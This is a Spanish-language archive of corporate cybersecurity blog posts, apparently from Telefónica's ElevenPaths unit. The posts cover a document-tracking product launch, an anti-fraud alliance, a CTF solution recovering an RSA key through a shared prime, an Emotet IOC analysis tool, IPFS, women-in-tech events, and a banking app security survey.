ICS-SCADA, RFID, etc. Antonio Gil Antonio es un tecnólogo y apasionado por el mundo de la empresa. Trabaja en Softcom desde hace 30 años, donde además de ser el CEO y fundador, dedica gran parte de mi tiempo a otra de sus pasiones como es la ciberseguridad. Desarrolla su actividad dentro del área de la gestión de la seguridad de la información como auditor, y también actúa como perito tecnológico. Es presidente de la Asociación de Peritos Judiciales Tecnológicos de Andalucía (APTAN) y mentor en ciberseguridad en Andalucia Open Future (AOF) en Sevilla. Todas estas actividades las compagina con el cargo de Director del Máster en Ciberseguridad de la Universidad Loyola Andalucía Para los organizadores de eventos, charlas y conferencias que quieran contar con alguno de estos expertos en los mismos, ponemos a su disposición una dirección de correo. cse@11paths.com en el que esperamos sus solicitudes. ¡Estaremos encantados de acudir a compartir conocimiento!
27 de junio de 2019
TEGRA Cybersecurity Center presenta Stela FileTrack, la primera solución para empresas
El objetivo de esta herramienta es proteger la información documental sensible en las organizaciones. El centro impulsado por Telefónica y Gradiant reúne en Santiago a responsables de ciberseguridad de empresas de toda España para celebrar su primer aniversario TEGRA, el centro de ciberseguridad desarrollado en Galicia gracias a la unión de Telefónica y Gradiant, cumple su primer año con la presentación de una solución cuyo objetivo es proteger la documentación sensible de las organizaciones: Stela FileTrack. Esta herramienta permite saber la localización de la información sin importar si se encuentra en diferentes servidores, en local o alojada en la cloud, y cómo la comparten los trabajadores, ya sea de manera interna o externa. Responsables de las principales empresas de ciberseguridad de nivel regional y nacional se dieron cita en Santiago de Compostela para comprobar de primera mano cómo funciona la herramienta y compartir impresiones. Impulsado por Gradiant y Telefónica, a través de su Unidad de Ciberseguridad, ElevenPaths, y con el apoyo de la Xunta de Galicia, concretamente la Axencia Galega de Innovación (GAIN), TEGRA nace en mayo de 2018 en el marco de la unidad mixta de investigación IRMAS (Information Rights Management Advanced Systems) con la misión de mejorar la seguridad de la información de las empresas a través de la tecnología y situar a Galicia como agente relevante en el ámbito de la ciberseguridad. La unidad mixta de investigación en ciberseguridad IRMAS, en la que se enmarca el nacimiento de TEGRA, está cofinanciada por el Programa Operativo FEDER 2014-2020 de la Unión Europea, cuyo objetivo es promover el desarrollo tecnológico, la innovación y la investigación de calidad. Además de las posibilidades de Stela FileTrack, los asistentes a la jornada los asistentes pudieron probar las tecnologías innovadoras sobre las que se está construyendo la herramienta. Durante el evento organizado hoy, se ha celebrado una mesa redonda centrada en la problemática de las “Fugas de información: impacto, control y mitigación”, en la que han participado Roberto Baratta Martínez, Director de Prevención Pérdidas-Continuidad de Negocio-Seguridad de ABANCA; Carlos López Blanco, Head of Digital Risk Office de Hijos de Rivera SAU; Fernando Suárez Lorenzo, Director del Área de Transparencia y Gobierno Abierto de la Deputación de Ourense y David González González, Responsable de Seguridad de Información del Grupo COREN; y fue moderada por Fernando Jiménez, Gerente de Gradiant. El acto fue clausurado con una keynote final por Ignacio Caño Luna, Responsable de innovación y emprendimiento del INCIBE. Desde su creación, el objetivo de TEGRA Cybersecurity Center es desarrollar productos y servicios para mejorar la seguridad de la información de las empresas mediante técnicas criptográficas avanzadas, diseñar mecanismos de comprobación de la identidad en el acceso a la información y herramientas de análisis de datos, además de sistemas de clasificación de documentación y de detección de accesos irregulares a la información. El centro también trabaja para generar alianzas estratégicas, colaborando con organismos y entidades como la Comisión Europea, Cyber Threat Alliance, Europol, INCIBE, la Organización de Estados Americanos (OEA) y la European Cyber Secutiry Organisation –ECSO-, de la que Telefónica y Gradiant son socios. “TEGRA es un medio excelente para poner al servicio de la sociedad y las empresas el potencial investigador de Gradiant en materia de ciberseguridad, uno de los pilares tecnológicos imprescindibles para el avance de la sociedad y la economía digitales. La alianza con ElevenPaths sin duda ayuda a acortar el camino entre la investigación y el mercado” Luis Pérez Freire, Director General de Gradiant TEGRA también trabaja para situar a Galicia como agente relevante en el sector y genera empleo en I+D+i en nuestra comunidad. La ciberseguridad se ha convertido en un aspecto fundamental dentro de las organizaciones, además de un elemento habilitador de la Industria 4.0. Con TEGRA, Galicia apuesta por la innovación en este ámbito y espera convertirse en un referente nacional e internacional en materia de ciberseguridad. Para ello, cuenta con la apuesta de Telefónica, a través de su Unidad Global de Ciberseguridad, ElevenPaths, y Gradiant, el centro tecnológico TIC de referencia en Galicia. El centro arrancó su actividad con 20 especialistas y dos oficinas, una en la sede de Gradiant en Vigo y otra en la sede de Telefónica en A Coruña. Ambas organizaciones participan en el nuevo centro con una inversión similar -1,2 millones de euros por parte de Telefónica y 1,1 millones por parte de Gradiant-, y la Xunta de Galicia, a través de la Axencia Galega de Innovación -GAIN- aporta más de 678.000 euros. Puedes consultar la nota de prensa en la que anunciamos el nacimiento de TEGRA en este enlace.
19 de junio de 2019
Telefónica y BOTECH FPI, juntos contra el fraude en el sector bancario
El pasado 31 de mayo se consolidó la alianza entre Telefónica y BOTECH FPI (Fraud, Prevention & Intelligence) con el objetivo de explotar las sinergias de estas empresas en la lucha contra el fraude bancario. El músculo, la dimensión y la capacidad de llevar a cabo grandes proyectos de Telefónica, unida a la especialización en tecnología de detección de fraude de BOTECH FPI, hacen de esta alianza la combinación perfecta para luchar contra el fraude online, el cual representa un peligro constante para las empresas del sector y que año a año continúa creciendo como amenaza. ¿Sabías que los ciberataques a bancos representan pérdidas cercanas al 9 % de sus ingresos netos? Además, EEUU, Reino Unido y España son los países que más ataques cibernéticos sufren. Tecnología, personas y procesos se unen en este proyecto destinado a luchar contra el fraude en el sector bancario, un mercado segmentado, cambiante y diverso. Gracias a tecnologías novedosas, somos capaces de prever y adelantarnos a las amenazas, consolidándonos como líderes en prevención, gestión y mitigación del fraude. En este vídeo se expone a la perfección los beneficios que aporta la nueva alianza a los clientes, basados en seguridad 24x7, gestión del fraude, reducción de la superficie de ataque y flexibilidad, escalabilidad, calidad y automatización. Para más información, lee la nota de prensa completa.
12 de junio de 2019
Solución a #EquinoxRoom111: ¿Te atreves a descifrar estos archivos secuestrados?
Por fin nos han ayudado a recuperar nuestros ficheros. Vamos a explicar qué hemos hecho y cómo ha sido solucionado (desde diferentes perspectivas). La seguridad en la criptografía asimétrica ,usando claves RSA, se basa en la premisa de que es muy difícil computacionalmente factorizar los dos factores primos de un número. Multiplicar dos números primos p y q para obtener n es una operación sencilla y su complejidad no aumenta drásticamente cuando los números crecen: 1736640013 x 1230300287 = 2136588706409583731 En cambio, la operación inversa, dado un número n obtener sus dos factores primos es una operación que se vuelve computacionalmente inviable cuando los números involucrados son lo suficientemente grandes. ? x ? = 2136588706409583731 Para generar la pareja de claves, el algoritmo RSA crea una clave pública y privada usando este concepto. Simplificando la generación de las claves, los números primos elegidos aleatoriamente p y q se multiplican para crear el módulo n que se usará tanto en la clave privada como en la pública. Este módulo n es público pero los factores primos p y q no. Del certificado incluido en los ficheros, podemos leer la clave pública y obtener el módulo y exponente: openssl x509 -in Certificate1 -text > Certificate1.info openssl x509 -in Certificate2 -text > Certificate2.info Se obtiene fácil el exponente (e) 65537 y el módulo (n) en hexadecimal. También así: Intentar obtener la clave privada a partir de estos datos requeriría factorizar el módulo obtenido y así obtener los primos p y q usados para generar ambas claves. Esta operación, con un número tan grande, no es viable computacionalmente en un periodo de tiempo razonable. En este caso, tenemos una pista que nos puede ayudar a intentar encontrar esos dos números. Sabemos que el ransomware se ha ejecutado en máquinas cuyo generador de números aleatorios estaba configurado al mínimo lo que puede haber dado a repeticiones de números primos durante distintas generaciones. Por lo tanto se podría haber dado el caso en el que dos módulos compartan el mismo número p o q. n1 = p1 x q1 n2 = p1 x q2 Si este caso se produce, ambos módulos n1 y n2 compartirían un divisor común p1. Para probar esta hipótesis se puede realizar una operación matemática muy sencilla, el cálculo del máximo común divisor usando el algoritmo de Euclides. El resultado de calcular el MCD sobre los dos módulos obtenidos de las claves públicas revela que ambos números comparten un divisor distinto de 1. Con este cálculo sencillo se consigue uno de los dos primos usados para la generación de ambas claves, conseguir los otros dos primos desconocidos es trivial (mucho ojo a la necesidad de utilizar doble barra para división de números grandes). En Python es sencillo así: Para el cálculo del MCD se pueden usar herramientas como RSACtfTool, o Sanity Cheker, basado en SageMath, y en general, para cálculos rápidos con números enormes, existen diferentes páginas que se pueden consultar, como este ejemplo. Siguiendo cualquier manual de RSA, sacamos todos los datos se debe construir la clave privada a partir de dos primos y el exponente. Tenemos la opción de hacerlo a través de openssl. Primero creamos un archivo con la información: asn1=SEQUENCE:rsa_key [rsa_key] version=INTEGER:0 modulus=INTEGER:0xD1F50CC7F pubExp=INTEGER:0x10001 privExp=INTEGER:0x2396DB3CC6CB…. p=INTEGER:0x00e95df998acf149cae5d…. q=INTEGER:0x00e651db2d769829da0… e1=INTEGER:0x6E2FD10A259E481965…. e2=INTEGER:0x782436DA8E446D80669… coeff=INTEGER:0xA70D92326A2813D9F…. Y luego se ejecuta el comando para construir la clave, por ejemplo: openssl asn1parse -genconf asn_002.txt -out private_key_002.der Aunque también se puede hacer con Python de varias formas. Aquí la usada por el ganador. Innovación y Laboratorio en ElevenPaths www.elevenpaths.com
8 de abril de 2019
IOC_Emotet: nuestra nueva herramienta de análisis para formatos Microsoft Office XML
Emotet sigue siendo una de las amenazas más persistentes en el mundo, pero particularmente en Latinoamérica está golpeando con cierta insistencia. Hace algunas semanas aconsejábamos una fórmula para mitigar el acceso a un cierto tipo de formato de archivo Office que está siendo utilizado por atacantes, además de explicar cómo funcionaba internamente. Ahora mostraremos una pequeña herramienta que automatiza el proceso de análisis. Esta herramienta de línea de comandos, creada por nuestro compañero, perteneciente al equipo de ElevenPaths Chile,Ricardo Monreal, extrae los Indicadores de Compromiso (IOC) de este formato concreto de archivo Office, usado por atacantes. Este script en bash se apoya en otras herramientas que se pueden encontrar en sus respectivos repositorios oficiales: Olevba: analiza el código de macros (es parte de oletools) XMLStarlet: analiza archivos XML como el Microsoft Office XML (más info) Con estas herramientas instaladas, simplemente es necesario ejecutar el script de la siguiente forma: Algunos ejemplos de análisis de un archivo Microsoft Office XML se pueden observar en las siguientes capturas, con diferentes casos de ofuscación. Donde se pueden observar dominios y código de la macro, dado el caso. En el caso de que se realice el análisis de un archivo .doc con macros y, además, con payload comprimido con DEFLATE, también se mostrarían los IOC en claro. Incluso lo mostraría si se ofuscasen de maneras más complejas las cargas maliciosas y dominios, recuperando la información. La herramienta se encuentra disponible aquí. Recordamos que también disponemos de nuestra herramienta DIARIO para analizar documentos maliciosos respetando La privacidad del contenido. Ricardo Monreal Malware Intelligence en ElevenPaths Chile @joy_dragon ricardo.monreal@telefonica.com
27 de marzo de 2019
En CDO buscamos talento como tú
Desde la Unidad de Chief Data Office de Telefónica, liderada por Chema Alonso, buscamos a gente con talento para que forme parte de un equipo joven, y con ganas de afrontar nuevos retos profesionales, en nuestras oficinas de Madrid. Si te apasiona la tecnología, esta oferta de empleo es para ti #TalentoTelefónica. https://www.youtube.com/watch?v=QsEeKee7Y0g Buscamos dos perfiles: Phython Backend Developer: buscamos un perfil para colaborar en el área de Tokenización de Red, un nuevo proyecto que busca devolver al cliente de Telefónica el valor que producen ,tantos sus acciones, como sus datos dentro de nuestra red. Además, también podrá estar sumergido en el proyecto de Aura, con responsabilidades como el diseño e implementación de los módulos cognitivos de Aura, la revisión del código y el desarrollo de software como miembro del equipo. Si eres licenciad@ en Ingeniería en Informática o Telecomunicaciones, ¡esta oferta te interesa! ¡APLICA AQUÍ! QA Analyst ¡APLICA AQUÍ! Si te unes a Telefónica, te unes a casi 100 años de historia, te unes a un equipo de 106 nacionalidades presentes en más de 35 países; un equipo que trabaja para conectar a las personas dondequiera que estén. Estamos liderando la revolución digital con el entusiasmo del primer día en todos nuestros negocios, creando el mejor ecosistema digital para nuestros clientes: red, IA, nube, seguridad, innovación, etc. En Telefónica cuentas con todo lo que necesitas para ser la mejor versión profesional de ti. Necesitamos gente como tú, que quiera asumir este reto de crear la Telefónica del mañana.
25 de marzo de 2019
Celebramos contigo el Día de la Mujer
Hoy, 8 de marzo, es el Día de la Mujer y queremos celebrarlo con todos vosotros . Desde Telefónica, hemos preparado este vídeo en el que cuatro mujeres, de distinta edad y con diferentes vivencias y entornos laborales, nos cuentan cómo ven el papel de la mujer en la tecnología, qué papel juega la tecnología en sus vidas y quiénes son sus referentes en este ámbito. Os dejamos el vídeo aquí, ¡no te lo pierdas! #DíadelaMujer #SomosDiversos ¿Sabes cuándo comenzó a conmemorarse el 'Día Internacional de la Mujer'? A finales del siglo XIX, durante la Industrialización, periodo de expansión y crecimiento de la población e ideologías radicales. En 1909, de conformidad con una declaración del Partido Socialista de los EEUU, el día 28 de febrero se celebró en todos los estados de este país el primer Día Nacional de la Mujer, que continuaron celebrándose el último domingo de febrero hasta 1913. La Carta de las Naciones Unidas, firmada en 1945, fue el primer acuerdo internacional para afirmar el principio de igualdad entre mujeres y hombres. Desde entonces, la ONU ha ayudado a crear un legado histórico de estrategias, normas, programas y objetivos acordados internacionalmente para mejorar la condición de las mujeres en todo el mundo. Con los años, la ONU y sus organismos técnicos han promovido la participación de las mujeres en condiciones de igualdad con los hombres en el logro del desarrollo sostenible, la paz, la seguridad y el pleno respeto de los derechos humanos. El empoderamiento de la mujer sigue siendo un elemento central de los esfuerzos de la Organización para hacer frente a los desafíos sociales, económicos y políticos en todo el mundo. Este año, el tema elegido para el Día Internacional de la Mujer es Pensemos en igualdad, construyamos con inteligencia, innovemos para el cambio. Vamos a pensar en formas innovadoras en las que podamos abogar por la igualdad de género y el empoderamiento de las mujeres, en especial en sistemas de protección social, el acceso a los servicios públicos y la infraestructura sostenible. Mujeres científicas importantes a lo largo de la historia Marie Curie ha sido la investigadora más importante de la historia, pero no la única. Pese a trabajar durante mucho tiempo a la sombra de varones y, generalmente, en peores condiciones, otras mujeres también han consiguido importantes hitos científico: Rosalind Franklin: Esa mujer capturó una fotografía obtenida por difracción de rayos X y que revelaba claramante la naturaleza heliocoidal de la molécula de ADN en la que se basaron Watson y Crisk para el descubrimiento de la estructura en doble hélice del ADN, la molécula fundamental para la vida. Sin esta imágen, estos dos hombres no hubieran descubierto la estructura del ácido desoxirribonucléico, al menos no en la fecha en la que lo hicieron. María Josefa Yzuel: esta mujer fue la primera mujer en España que obtuvo la titulación de Profesora Agregada de Universidad en el área de física. Su trabajo durante tres décadas ha mejorado el diagnóstico médico basado en imágenes; ha ayudado a perfeccionar las pantallas de cristal líquido; y ha desarrollado técnicas de reconocimiento automático de imagen con muchas aplicaciones. Cuenta que sigue habiendo pocas físicas, ella escogió esta carrera en una época en que muchos consideraban que "había otras ramas más apropiadas para una chica". Margaret Hamilton: ¿conoces la importancia del ordenador a bordo para poder llegar a la luna?Margaret Hamilton, matemática, desarrollo un software vital para poder llegar a la luna. Gracias a ella se produjo un antes y un después en la industria de la informática, pero es ahora cuando se empieza a reconocer su labor.
8 de marzo de 2019
IPFS, la nueva web resiliente
Cuando analizamos detalladamente cómo funciona la entrega de contenido web en la actualidad, nos damos cuenta que las arquitecturas de estos servicios muchas veces son poco eficientes e inseguras. Mostramos algunos de los problemas y necesidades que nos podemos encontrar al respecto. Cuando analizamos detalladamente cómo funciona la entrega de contenido web en la actualidad, nos damos cuenta que las arquitecturas de estos servicios muchas veces son poco eficientes e inseguras. En varios de nuestros talks ya hemos analizado diferentes amenazas y mecanismos de protección pero hoy, queremos hablar de algunos de los problemas y necesidades que nos podemos encontrar al respecto: • Brindar alta disponibilidad: ¿Cómo conseguimos dotar a nuestro contenido web de una alta disponibilidad para los usuarios? Para resolver esto se realizan complejas arquitecturas tecnológicas que llegan incluso hasta protocolos de enrutamiento a nivel de los proveedores de comunicaciones. A pesar de ello no se consigue lograr el objetivo final, ya que no se cubren los casos de fallos en la aplicación o en la configuración del servidor web. • Crecimiento en la cantidad de usuarios: Cada vez hay más usuarios y sus accesos se realizan desde múltiples dispositivos lo que hace que cada vez la cantidad de datos a entregar sea mayor. Otra vez caemos en lo mismo, la eficiencia en el proceso de entrega del contenido. • Crecimiento en el tráfico: como nuestra cantidad de usuarios crece, también aumenta la cantidad de tráfico. Sumando esto a las nuevas tecnologías web y a las necesidades que los usuarios demandan de ellas, es necesario subir archivos cada vez más pesados a la web. • Ciberataques y modificaciones no autorizadas (defacements): A nivel de aplicación web, si el servidor web es atacado y, por ejemplo, se borra todo el contenido, los usuarios no verían el contenido hasta que el administrador no restaure los datos desde una copia de respaldo y al mismo tiempo, se solucione la vulnerabilidad de la aplicación. Nos podría surgir entonces otra pregunta, ¿cómo sabemos que el archivo (página web) a la cual estamos haciendo un request es el original? ¿Y si alguien puso un código malicioso en ese archivo después de haberse subido al servidor? • Privacidad y censura en Internet: El diseño del protocolo actual de navegación (HTTP) hace que la entrega de contenido web sea centralizado. Como comentábamos, el contenido siempre se entrega desde un servidor o punto central. Evidentemente, si alguien quisiera controlar el contenido y a quién se entrega, con un diseño centralizado le sería más fácil al ejercer un control sobre el contenido. Pero entonces entraríamos en un tema de libertad de expresión y otras consecuencias que no son el alcance de este post, aunque haya una estrecha relación. Las soluciones asociadas a estas problemáticas suelen ser costosas, complejas y sobre todo requieren una inversión en la operación de estos controles y el mantenimiento de los mismos: Redundancia completa de la arquitectura de red, incluyendo, firewalls, servidores, controles de seguridad. Redundancia a nivel de carrier. Controles de integridad en el filesystem de los servidores web. Controles de tráfico para identificar y bloquear ataques a las aplicaciones web. Monitorización de seguridad. Sistemas de replicación. Sistemas de optimización del tráfico. Desarrollo optimizado y seguro de software. Para optimizar el tráfico y la entrega, podríamos pensar que, si estuviéramos suficientemente cerca de nuestro usuario, la entrega sería más rápida. Esto es así, pero lo difícil es estar cerca de todos nuestros usuarios al mismo tiempo. Por lo cual, la siguiente opción que podemos ver sería distribuir nuestra aplicación web y replicarla en diferentes servidores en Internet. Esto conseguiría que nuestros usuarios tuvieran un servidor más cercano a su ubicación lógica lo que hace que la velocidad de acceso también sea uno de los temas a tratar. Profundizando un poco más, HTTP es un protocolo que está presente desde año 1991 lo que inevitable nos lleva a plantear que después de 25 años, sería un buen momento para pensar en cambiarlo. El protocolo HTTP hace que el Internet actual tenga una estructura principalmente centralizada, aunque también encontramos usos descentralizados, pero si pensamos en cambiar este protocolo, la estructura hacía la podríamos evolucionar tendería más a buscar una estructura distribuida como se aprecia en la imagen: Una de las tecnologías disruptivas que está creciendo más y más, es el Blockchain, y específicamente con Ethereum surgió el concepto de aplicación distribuida (DAPP). Esta aplicación en realidad estaba más distribuida en su backend que en su front. Es decir, la ventaja que nos daba una DAPP es que podemos poner toda su lógica en programas que se encuentran en el blockchain llamados contratos inteligentes, y los datos también en el blockchain. De esta manera con un simple HTML y un código en JavaScript podríamos hacer llamadas a los contratos inteligentes, siendo entonces que en una DAPP no importa donde resida este HTML ni tampoco si el mismo es alterado, porque en la medida que se haga la llamada al contrato inteligente, sería la única forma de agregar datos al blockchain o cambiar los estados en los contratos. Sin embargo, no está resuelto el tema de cómo distribuimos nuestra aplicación por diversos servidores. Porque este parece uno de los caminos que nos podría ayudar en la solución de las problemáticas que comentábamos antes. De estas necesidade, de los avances logrados con blockchain (específicamente con el árbol de Merkle) y de protocolos como el de Git para mantener un control de versiones, nace IPFS. Os comentamos revisar este post en el cual se detalla todo el funcionamiento del blockchain y donde encontrarás más información sobre el árbol de Merkle. IPFS (InterPlanetary File System), es un protocolo de hipermedia p2p ( peer to peer). Es similar a HTTP pero con la combinación de otros sistemas como BitTorrent, Kodemila, Git y árbol de Merkle en una arquitectura de DAG ( Directed Acyclic Graph) como la utilizada en IoTA. De esta forma crea un subsistema distribuido de Internet. ¿Cómo funciona el IPFS? IPFS es un protocolo de código abierto desarrollado originariamente por Protocol Labs. Actualmente muchos programadores en Internet colaboran con el desarrollo de este proyecto que utiliza una tabla de hash distribuida ( distributed hash table – DTH). En esta estructura almacena la información en forma de pares clave/valor. La DTH se distribuye por la red para que los nodos puedan buscar y acceder de forma eficiente a la información. Las principales ventajas que le brinda la DTH son: Descentralización. Tolerancia a fallos. Escalabilidad. Los nodos no requieren una coordinación central y el sistema puede funcionar en forma confiable incluso si algún nodo se cae o deja la red. Estos componentes dotan a esta red de la resiliencia que las estructuras centralizadas de cliente-servidor. Otro componente de IPFS es el intercambio de los bloques , los cuales se realizan por medio de un protocolo basado en el popular sistema de intercambio de archivos BitTorrent. Este protocolo se llama BitSwap, el cual funciona como una especie de marketplace para todo tipo de datos. En la actualidad, Filecoin es un ejemplo de la implementación de un marketplace de almacenamiento tipo p2p construido con IPFS. El DAG de Merkle, (el otro componente), es una mezcla de un DAG y el árbol de Merkle. Esta estructura asegura que todos los bloques intercambios en la red p2p son correctos, no están dañados ni han sido alterados. Esta verificación se realiza organizando los bloques de datos utilizando funciones criptográficas de hash. Además de esto, IPFS utiliza un sistema de archivos auto certificado (Self-certifying File System – SFS). El SFS es un sistema de archivos el cual no requiere permisos especiales para compartir los datos. Es auto certificado ya que los datos enviados al cliente se autentican directamente por el nombre del archivo, el cual además está firmado por el servidor. De esta forma crea el InterPlanetary Name Space (IPNS). El IPNS es un SFS con una estructura de llave pública (PKI), la cual es utilizada para certificar los objetos de todos los usuarios en la red. Así, cada objeto en la red posee un único identificador, lo cual es igual para el nodo. Cada nodo posee un par de llaves, pública y privada, y un identificador, el cual es un hash de su llave pública. Los nodos utilizan su llave privada para firmar cada dato que publican en la red, y los clientes pueden verificar su autenticidad e integridad con la llave pública del nodo emisor. IPFS es un nuevo protocolo de www, el cual podemos comenzar a utilizarlo para la entrega de nuestro contenido web, de forma segura y logrando resiliencia frente a diversas ciberamenazas. ¡Os invitamos a utilizarlo y a enviar vuestros comentarios y preguntas!
4 de enero de 2019
Segunda Edición de #GirlsInspireTech18: el laboratorio tecnológico para hijas de empleados de Telefónica
Las sociedades se transforman cada vez más deprisa. Cuanto mayor es la innovación mayor es la capacidad de cambio en una sociedad. Sin embargo, esta transformación acelerada abre importantes incógnitas, ya que es capaz de generar grandes desigualdades. ¿Cómo nos afecta en función de la edad, la geografía, o el género? Desde Telefónica creemos que para crear tecnología hay que tener pasión por hacerlo, y no debe existir ninguna correlación entre género y ocupación. Por eso, el sábado 15 de diciembre celebramos el evento Girls Inspire Tech 2018, una iniciativa liderada por las #MujeresHacker que trabajan en Telefónica. Te contamos qué pasó en Girls Inspire Tech #GirlsInspireTech18 La jornada arrancó con la bienvenida de Chema Alonso, Chief Data Officer de Telefónica y Chairman de ElevenPaths, seguida por Chus Almazor, consejera delegada en Telefónica España, que recordó a todas las niñas que ellas son las protagonistas, seguida de Elena Gil, CEO de LUCA, quien sorprendió a la audiencia con su sesión sobre el valor de los datos. Tras los mensajes de Almazor y Gil, fue el turno para Isabel López-Baeza, de LUCA, que a lo largo de su participación nos convenció de que todos tenemos un don y solo hay que aprender a usarlo, mientras que Yaiza Rubio y Eva Suárez, analistas y programadoras en ElevenPaths, respectivamente, echaron un pulso a la vida digital de las asistentes con las que interactuaron para mostrar la importancia de la ciberseguridad. Después de un breve descanso con un magnífico brunch, se reanudó la jornada con las sesiones más experimentales. Si no te suena CX, UX y UI, entonces necesitas asistir a una masterclass de #MujeresHacker con María Luisa Rivero y Elena Gómez, del departamento de UX de Telefónica, para conocer de primera mano cómo diseñar experiencias para las personas. Y en estos momentos en los que el interés por la Inteligencia Artificial es palpable, Marta Pérez y Ana Isabel Molina, de Aura, el asistente virtual de Telefónica, fueron más allá, en busca de la personalidad de la IA. Para finalizar, las niñas pusieron a prueba sus conocimientos de programación participando en los 15 retos de La Hora del Código, un concurso cuyas fases superaron en menos de 15 minutos, demostrando así que estas chicas, de entre 11 y 15 años, son ya unas auténticas #MujeresHacker. #MujeresHacker es una iniciativa de Telefónica que impulsa la diversidad y apoya el sueño de las niñas que desean ser programadoras, matemáticas e ingenieras, para que sean conscientes de su potencial. Ellas, con nuestro apoyo, definirán la tecnología del futuro. Gracias a las #MujeresHacker que trabajan en ElevenPaths, LUCA, Aura y Cuarta Plataforma por inspirar a las más jóvenes en Girls Inspire Tech #GirlsInspireTech18. ¿Te perdiste el evento anual para hijas de empleados de Telefónica? Vídeo resumen aquí:
19 de diciembre de 2018
Segunda Edición de Women in Cybersecurity of Spain organizada por Telefónica
El pasado martes, 11 de diciembre, celebramos en el Edificio Central de Telefónica Madrid la Segunda Edición de Women in Cybersecurity of Spain (WiCS). Este encuentro nace con el objetivo de ser un referente para impulsar la diversidad de género en el sector de la ciberseguridad en España. La iniciativa está promovida por Idoia Mateo (Banco Santander), Yoya Silva (DXC), Karen Gaines (Microsoft) y Julia Perea (Telefónica), para impulsar la diversidad de género en Ciberseguridad y así lograr un mundo digital más inclusivo y seguro. Ponentes de la talla de María Jesús Almazor (COO de Telefónica España), Yaiza Rubio (Hacker de Telefónica) y Olvido Nicolás (Directora de Brand Experience de CDO) compartieron una mañana de trabajo con medio centenar de mujeres líderes en el sector de las principales empresas del país. Olvido Nicolás (Directora de Brand Experience de CDO en Telefónica), Martina Matarí (Incident Responder CSIRT Global de Telefónica) y Yaiza Rubio (Analista de Inteligencia de CDO en Telefónica) Los objetivos principales de este encuentro son: Aunar el talento femenino del sector en España para compartir experiencias y motivar a las mujeres a considerar la ciberseguridad como un campo profesional donde desarrollarse. Explorar las posibles razones y soluciones para abordar la brecha de género en el sector de la ciberseguridad. Generar, compartir y difundir las mejores prácticas de una transformación digital segura y servir de role models para otras mujeres, jóvenes y niñas, para que comprueben que este no es solo un mundo de hombres, sino que ellas pueden jugar un papel relevante en la economía digital. Generar nuevas perspectivas y estrategias para una transformación digital segura que contemple la ciberseguridad desde su misma definición con una perspectiva holística, profundizando al mismo tiempo en un enfoque industrial.
14 de diciembre de 2018
Cyberintelligence Report: Ciberseguridad en aplicaciones móviles bancarias
A medida que el mundo se vuelve más digital, surgen nuevas oportunidades y amenazas, y tendemos a centrarnos más en los negocios. Como consecuencia, cuando estamos tratando de desarrollar un nuevo producto, sitio web o aplicación, tendemos a priorizar la velocidad, conveniencia y facilidad de implementación en lugar de la seguridad. Desde ElevenPaths hemos realizado un análisis de un total de 56 de los principales bancos alrededor del mundo. Este análisis se basa en archivos públicos, aplicaciones web y aplicaciones móviles de estos bancos y aborda tres aspectos clave de la ciberseguridad: La seguridad integrada en las aplicaciones móviles Los metadatos disponibles en los documentos públicos La información que podemos obtener sobre las comunicaciones de los servicios y su calidad (es decir, los puertos abiertos en los servidores, sus vulnerabilidades, etc). Para recopilar la información hemos hecho uso de, principalmente, cuatro herramientas: FOCA OpenSource, una herramienta de desarrollo propio (gratuita y Open Source) para encontrar documentos a través de los buscadores, descargarlos, extraer sus metadatos y analizarlos. Tacyt y mASAPP, dos herramientas también de desarrollo propio que permiten visualizar la información de las apps en mercados oficiales y no oficiales, así como encontrar vulnerabilidades de aplicaciones móviles. mASAPP, además, puntúa cada aplicación usando un sistema propietario de scoring para clasificar las apps de más a menos seguras. Cuanto más alta es la puntuación de mASAPP, peor se considera la seguridad de esa aplicación. Censys, una herramienta OSINT pública de búsqueda de servidores y dispositivos expuestos en Internet. Permite también encontrar hosts y servicios específicos asociados a los dominios de cada banco y ver cómo se configuran los sitios web y sus certificados. mASAPP- Puntuación de riesgo global por región Resultados del análisis. Respecto a las aplicaciones móviles: Todos los bancos analizados tenían vulnerabilidades en sus aplicaciones oficiales, causadas principalmente por fallos en la calidad del código. La vulnerabilidad más común fue la potencial inyección SQL. Los bancos de Asia, África y Latam fueron los que obtuvieron peores resultados. Comparamos qué permisos pedía cada aplicación bancaria. A pesar de estar en la misma industria y proporcionar el mismo servicio, solamente un permiso era común a todas ellas: Acceso a Internet. Oriente Medio fue la región con el menor promedio de permisos solicitados, mientras que Asia fue la región con el mayor número de permisos solicitados por aplicación. Permisos intrusivos como acceso a los contactos del teléfono, realización de llamadas sin la confirmación del usuario, lectura y escritura de SMS o lectura y escritura de ajustes del sistema estaban presentes en varias aplicaciones analizadas. Algunos bancos africanos nunca han tenido aplicación móvil. Resultados del análisis. Respecto a los metadatos: Se detectaron cientos de cuentas de administrador y varias cuentas genéricas con características de administradores. Basándonos en los metadatos obtenidos, existen indicios de que la mayoría de los bancos puede seguir utilizando sistemas operativos que actualmente no tienen soporte de sus fabricantes. El análisis de los archivos públicos también nos ha permitido obtener la ubicación física y los nombres de varios servidores e impresoras. Esta información debe ocultarse debido a las consecuencias que puede acarrear que un actor malicioso se haga con ella. Resultados del análisis. Respecto a los servidores, los hosts y las comunicaciones: A pesar de que casi el total de los hosts utilizan HTTPS, todavía hay una gran cantidad de servicios HTTP, un protocolo no seguro. La mitad de los bancos utilizan Akamai. El tráfico pasa principalmente por servidores norteamericanos. Los bancos que no utilizan Akamai tienden a alojar sus servicios localmente. La única excepción es Asia, donde los bancos que no trabajan con Akamai también tienen sus servidores en Estados Unidos. Ninguno de los bancos analizados de África utiliza Akamai. África es la región en la que la mayoría de sus servicios están alojados localmente, seguida por Oriente Medio. El servicio más popular cuando no hay ningún Akamai involucrado es FTP, seguido por SMTP y diferentes tipos de bases de datos. La mayoría de los servicios están alojados en Norteamérica. Europa parece ser la segunda mejor opción, pero con una gran diferencia con respecto a Norteamérica. ¡INFORME COMPLETO AQUÍ! Con la colaboración de: Helene Aguirre Mindeguia Pablo Bentanachs Sebastián García de Saint-Léger Pablo Moreno González
22 de noviembre de 2018
Las nueve claves que necesitas saber para conocer Movistar Home
